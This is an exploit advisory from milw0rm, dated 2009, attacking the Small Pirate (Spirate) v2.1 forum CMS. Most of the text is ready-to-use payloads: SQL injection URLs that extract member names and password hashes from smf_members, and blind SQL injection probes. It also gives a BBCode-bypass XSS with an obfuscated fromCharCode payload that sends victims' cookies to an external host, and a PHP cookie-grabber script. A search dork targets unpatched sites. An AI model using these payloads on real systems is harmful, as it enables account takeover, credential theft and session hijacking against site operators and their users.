Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities

VIEWS: 173 PAGES: 6

									                        Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                            Page 1/6
  1    ***********************************************************************************************
  2    ***********************************************************************************************
  3    **                                                                                           **
  4    **                                                                                           **
  5    **     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
  6    **     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
  7    ** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
  8    ** [−−−−−[]−−−−−[][][][>−−[]−−[]−[]−−−[][][]−−[]−[]−−[]−−−−−−−−[]−−−−−[][][][>−−[][][][]−−−\
  9    **==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>−−
  10   ** [−−−−[[]]−−−−[]−−− −−−−[]−−−−−[]−−−[]−−[]−−−−−[]−−[]−−−−−−−[] []−−−[]−−−−−−−−−−[]−−[]−−−/
  11      [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
  12   **                                                                                           **
  13   **                                                                                           **
  14   **                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                       **
  15   **                                      ¡PROUD TO BE SPANISH!                               **
  16   **                                                                                           **
  17   ***********************************************************************************************
  18   ***********************************************************************************************
  19
  20   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  21   |                                 MULTIPLE REMOTE VULNERABILITIES                            |
  22   |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|
  23   |                                   |     Small Pirates v−2.1    |                           |
  24   | CMS INFORMATION:                    −−−−−−−−−−−−−−−−−−−−−−−−−−                             |
  25   |                                                                                            |
  26   |−−>WEB: http://spirate.net/foro/                                                            |
  27   |−−>DOWNLOAD: http://spirate.net/foro/                                                       |
  28   |−−>DEMO: http://www.santiagoescraches.com.ar/index.php                                      |
  29   |−−>CATEGORY: CMS / Board                                                                    |
  30   |                                                                                            |
  31   | CMS VULNERABILITY:                                                                         |
  32   |                                                                                            |
  33   |−−>TESTED ON: firefox 3                                                                     |
  34   |−−>DORK: "Basado en Spirate"                                                                |
  35   |−−>CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION          |
  36   |−−>AFFECT VERSION: <= 2.1                                                                   |
  37   |−−>Discovered Bug date: 2009−05−10                                                          |
  38   |−−>Reported Bug date: 2009−05−10                                                            |
  39   |−−>Fixed bug date: N/A                                                                      |
  40   |−−>Info patch: Not fixed                                                                    |
  41   |−−>Author: YEnH4ckEr                                                                        |
  42   |−−>mail: y3nh4ck3r[at]gmail[dot]com                                                         |
  43   |−−>WEB/BLOG: N/A                                                                            |
  44   |−−>COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
  45   |−−>EXTRA−COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)                      |
  46   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  47
  48
  49   #########################
  50   ////////////////////////
  51
  52   SQL INJECTION (SQLi):
YEnH4ckEr                                                                                                   05/29/2009
                         Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                                  Page 2/6
  53
  54    ////////////////////////
  55    #########################
  56
  57
  58    <<<<−−−−−−−−−++++++++++++++ Condition: Nothing +++++++++++++++++−−−−−−−−−>>>>
  59
  60
  61    −−−−−−−
  62    INTRO:
  63    −−−−−−−
  64
  65
  66    This system is a mixed combinations.
  67
  68    Info by admin (quote):
  69
  70    "cw*= SMF+Paquetes"
  71    "Spirate=cw+añadidos+reparaciones+correcciones"
  72
  73    "*cw = casitaweb."
  74
  75
  76    −−−−−−−−−−−−−−−−−−−
  77    PROOFS OF CONCEPT:
  78    −−−−−−−−−−−−−−−−−−−
  79
  80
  81    [++] GET var −−> ’id’
  82
  83    [++] File vuln −−> ’pag1.php’
  84
  85
  86    ~~~~> http://[HOST]/pag1.php?id=−1+UNION+ALL+SELECT+1,2,3,version(),5,6/*
  87
  88
  89    [++] GET var −−> ’id’
  90
  91    [++] File vuln −−> ’pag1−guest.php’
  92
  93
  94    ~~~~> http://[HOST]/pag1−guest.php?id=−1+UNION+ALL+SELECT+1,2,3,concat(user(),0x3A3A3A,database()),5,6/*
  95
  96
  97    [++] GET var −−> ’id’
  98
  99    [++] File vuln −−> ’rss−coment_post.php’
  100
  101   [++] Note −−> More info in source code
  102
  103
  104   ~~~~> http://[HOST]/web/rss/rss−coment_post.php?id=−1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,ver
YEnH4ckEr                                                                                                           05/29/2009
                         Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                                  Page 3/6
        sion(),8/*
  105
  106
  107
  108   [++] GET var −−> ’id’
  109
  110   [++] File vuln −−> ’rss−pic−comment.php’
  111
  112   [++] Note −−> More info in source code
  113
  114
  115   ~~~~> http://[HOST]/web/rss/rss−pic−comment.php?id=−1+UNION+ALL+SELECT+1,2,3,4,current_user(),6,user(),8,9,user(),11,
        12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48
        ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/*
  116
  117
  118   [++[Return]++] ~~~~~> user, version and database.
  119
  120
  121   −−−−−−−−−−
  122   EXPLOITS:
  123   −−−−−−−−−−
  124
  125
  126   ~~~~> http://[HOST]/pag1.php?id=−1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHE
        RE+ID_MEMBER=1/*
  127
  128   ~~~~> http://[HOST]/pag1−guest.php?id=−1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_membe
        rs+WHERE+ID_MEMBER=1/*
  129
  130   ~~~~> http://[HOST]/web/rss/rss−coment_post.php?id=−1+UNION+ALL+SELECT+1,2,concat(memberName,0x3A3A3A,passwd),4,5,6,c
        oncat(memberName,0x3A3A3A,passwd),8+FROM+smf_members+WHERE+ID_MEMBER=1/*
  131
  132   ~~~~> http://[HOST]/web/rss/rss−pic−comment.php?id=−1+UNION+ALL+SELECT+1,2,3,4,concat(memberName,0x3A3A3A,passwd),6,c
        oncat(memberName,0x3A3A3A,passwd),8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
        ,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,
        54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=
        1/*
  133
  134
  135   [++[Return]++] ~~~~~> memberName:::passwd in ’members’ table
  136
  137
  138
  139   ######################################
  140   //////////////////////////////////////
  141
  142   COOKIE STEALING VULN (BYPASS BBCODE):
  143
  144   //////////////////////////////////////
  145   ######################################
  146

YEnH4ckEr                                                                                                           05/29/2009
                         Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                                  Page 4/6
  147
  148   <<<<−−−−−−−−−++++++++++++++ Condition: Post a comment +++++++++++++++++−−−−−−−−−>>>>
  149
  150
  151   −−−−−−−
  152   INTRO:
  153   −−−−−−−
  154
  155
  156   This system is a mixed combinations.
  157
  158   Info by admin (quote):
  159
  160   "cw*= SMF+Paquetes"
  161   "Spirate=cw+añadidos+reparaciones+correcciones"
  162
  163   "*cw = casitaweb."
  164
  165
  166   −−−−−−−−−−−−−−−−−−−
  167   PROOF OF CONCEPT:
  168   −−−−−−−−−−−−−−−−−−−
  169
  170
  171   [url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url]
  172
  173
  174   [++[Return]++] ~~~~~> recursive alert message saying "1"
  175
  176
  177   −−−−−−−−−−
  178   EXPLOIT:
  179   −−−−−−−−−−
  180
  181
  182   Cookie Grabber Script −−> capturethecookies.php
  183
  184   Example Script (Before Creat exploited.txt):
  185
  186   <?php
  187   $ck=$_GET["ck"]; //Capture the cookies
  188   $manejador=fopen("exploited.txt",’a’);
  189   fwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n−−EOF−−\r\n"); //Save the values
  190   fclose($manejador);
  191   echo "<script>location.href=’http://[HOST]/index.php’;</script>"; //Redirect...
  192   ?>
  193
  194   Example Hosting −−> http://www.myphpcookiestealing.es/capturethecookies.php?ck=
  195
  196   Poisoning’s comment:
  197
  198   [url][img]http://www.owned.owned onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,1
YEnH4ckEr                                                                                                           05/29/2009
                         Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                                  Page 5/6
        19,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,1
        01,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,
        61)+document.cookie [/img][/url]
  199
  200
  201   [++[Return]++] ~~~~~> Cookie and PHPSESSID in exploited.txt
  202
  203
  204   ###########################
  205   ///////////////////////////
  206
  207   BLIND SQL INJECTION (SQLi):
  208
  209   ///////////////////////////
  210   ###########################
  211
  212
  213   <<<<−−−−−−−−−++++++++++++++ Condition: Nothing +++++++++++++++++−−−−−−−−−>>>>
  214
  215
  216   −−−−−−−
  217   INTRO:
  218   −−−−−−−
  219
  220
  221   This system is a mixed combinations.
  222
  223   Info by admin (quote):
  224
  225   "cw*= SMF+Paquetes"
  226   "Spirate=cw+añadidos+reparaciones+correcciones"
  227
  228   "*cw = casitaweb."
  229
  230
  231   −−−−−−−−−−−−−−−−−−−
  232   PROOFS OF CONCEPT:
  233   −−−−−−−−−−−−−−−−−−−
  234
  235
  236   [++] GET var −−> ’id’
  237
  238   [++] File vuln −−> ’index.php’
  239
  240
  241   ~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 −−> TRUE
  242
  243   ~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 −−> FALSE
  244
  245
  246   −−−−−−−−−−
  247   EXPLOITS:
YEnH4ckEr                                                                                                           05/29/2009
                         Small Pirate v2.1 XSSSQL Multiple Remote Vulnerabilities                                Page 6/6
  248   −−−−−−−−−−
  249
  250
  251   ~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 −−> TRUE
  252
  253   ~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=4 −−> FALSE
  254
  255
  256
  257   <<<−−−−−−−−−−−−−−−−−−−−−−−−−−−−−EOF−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−>>>ENJOY IT!
  258
  259
  260   #######################################################################
  261   #######################################################################
  262   ##*******************************************************************##
  263   ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
  264   ##*******************************************************************##
  265   ##−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−##
  266   ##*******************************************************************##
  267   ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
  268   ##*******************************************************************##
  269   #######################################################################
  270   #######################################################################
  271
  272   # milw0rm.com [2009−05−29]




YEnH4ckEr                                                                                                        05/29/2009

								
To top